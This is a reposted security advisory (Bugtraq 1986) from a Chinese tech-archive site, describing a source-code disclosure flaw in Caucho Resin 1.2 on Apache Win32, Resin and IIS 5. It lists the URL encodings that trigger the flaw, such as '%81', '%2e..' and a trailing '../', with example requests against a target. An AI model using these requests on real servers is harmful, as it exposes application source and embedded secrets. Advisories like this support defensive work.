|
技术资料 > JSP技术 > Jsp/Servlet : Resin 1.2 重要源代码暴露漏洞 |
Resin 1.2 重要源代码暴露漏洞 March 25,2004 |
bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32
Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81
Resin Web Server:
../
Example: http://target/filename.jsp../
IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp
|
|
Copyright © 2001-2008 Shenzhen Hiblue Software Team All rights reserved